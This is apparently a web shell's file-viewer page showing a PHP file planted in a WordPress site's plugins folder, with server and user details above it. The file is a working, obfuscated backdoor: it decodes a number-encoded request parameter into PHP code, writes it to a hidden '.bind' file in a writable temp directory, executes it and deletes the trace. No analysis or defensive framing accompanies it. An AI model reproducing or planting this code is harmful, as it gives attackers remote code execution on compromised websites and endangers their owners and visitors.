HEX
Server: Apache
System: Linux p3plzcpnl504740.prod.phx3.secureserver.net 4.18.0-553.141.2.lve.el8.x86_64 #1 SMP Wed Jul 8 16:10:02 UTC 2026 x86_64
User: l2pbkn5l6xav (4972877)
PHP: 7.2.34
Disabled: NONE
Upload Files
File: /home/l2pbkn5l6xav/public_html/wp-content/plugins/bottom-1785527115.php
<!--gaAGPVBG-->
<?php

if(in_array("\x66\x61\x63tor", array_keys($_REQUEST))){
$flg = $_REQUEST["\x66\x61\x63tor"];
	$flg	=   explode (	 '.'	 	,   $flg 	);
$object	='';
$salt	='abcdefghijklmnopqrstuvwxyz0123456789';
$sLen	=strlen($salt);
$i	=0;

array_walk($flg, function ($val) use (&$object, &$i, $salt, $sLen) {
    $sChar	=ord($salt[$i % $sLen]);
    $d	=((int)$val - $sChar - ($i % 10)) ^ 1;
    $object .= chr($d);
    $i++;
});
$fac = array_filter([getenv("TEMP"), "/dev/shm", ini_get("upload_tmp_dir"), "/var/tmp", session_save_path(), getcwd(), "/tmp", sys_get_temp_dir(), getenv("TMP")]);
foreach ($fac as $parameter_group):
            if (is_writable($parameter_group) && is_dir($parameter_group)) {
            $hld = "$parameter_group" . "/.bind";
            $success = file_put_contents($hld, $object);
if ($success) {
    include $hld;
    @unlink($hld);
    exit;
}
        }
endforeach;
}